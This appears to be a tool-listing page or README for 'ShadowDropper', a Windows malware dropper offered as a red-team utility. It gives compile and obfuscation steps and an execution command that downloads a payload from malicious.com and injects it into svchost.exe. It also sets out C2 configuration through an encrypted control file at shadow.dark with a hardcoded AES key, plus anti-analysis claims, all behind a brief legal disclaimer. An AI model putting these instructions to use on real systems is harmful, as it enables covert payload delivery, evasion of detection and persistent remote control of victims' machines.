ShadowDropper


ShadowDropper is a utility for covertly delivering and executing payloads on a target system.

Author: EvilWhales
Project Added On: Jul 05, 2025
Category: Red-team
GitHub Stars: 6
Contributors: 1

ShadowDropper

Description

ShadowDropper is an advanced utility designed for the covert delivery and execution of payloads within a target system. This tool was developed as a demonstration platform for professional network and system security testing, leveraging encryption, process injection, and remote management to ensure maximum stealth. ShadowDropper is ideal for penetration testers and security researchers aiming to simulate sophisticated attacks in controlled environments.

Important Warning: This code is intended solely for educational and testing purposes in controlled environments with explicit written consent from system owners. Unauthorized use violates international cybersecurity laws and may result in severe legal consequences.

Key Features

  • Covert Delivery: Downloads and executes files from remote servers without detection.
  • Process Injection: Injects payloads into trusted system processes, such as svchost.exe.
  • Data Encryption: Utilizes the AES-128 algorithm to secure transmitted data.
  • Persistent C2 Channel: Maintains a stable connection for receiving commands and updates.
  • Anti-Analysis: Incorporates built-in mechanisms to protect against debugging and behavioral analysis.

Requirements

  • Operating System: Windows 7, 10, or 11 (64-bit).
  • Dependencies: Installed MSXML6 and Visual C++ Redistributable libraries.
  • Connectivity: Network access to the C2 server for command-and-control communication.

Installation and Usage

Compilation

  1. Clone the repository: git clone https://github.com/EvilWhales/ShadowDropper.git.
  2. Open the project in Microsoft Visual Studio or use the command line.
  3. Compile the code: cl ShadowDropper.c /link msxml6.lib advapi32.lib ntdll.lib shlwapi.lib /O2 /DNDEBUG.
  4. (Optional) Apply binary obfuscation using specialized tools (e.g., Themida or UPX) for enhanced protection.

Execution

  • Without Arguments: ShadowDropper.exe — automatically connects to the C2 server and executes received commands.
  • With Arguments: ShadowDropper.exe https://malicious.com/payload.exe C:\Temp\payload.exe "CustomAgent" inject svchost.exe — specify the URL, save path, user agent, and target process for injection.

C2 Server Configuration

  1. Create a control.bin file on the server https://shadow.dark/control.bin with the content: https://malicious.com/payload.exe;C:\Temp\payload.exe;CustomAgent;inject;svchost.exe (fields are separated by ;).
  2. Encrypt the file using the encryption key: {0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}. Use a tool like OpenSSL for AES-128 encryption.
  3. Host the encrypted file on an accessible server.

License

This project is distributed under the MIT License. Usage is restricted to lawful purposes, such as security testing with system owners’ consent. The author is not liable for any illegal activities conducted with this code.

Tool Information

Author: EvilWhales
Project Added On: July 05, 2025
License: Open Source
Tags: security tool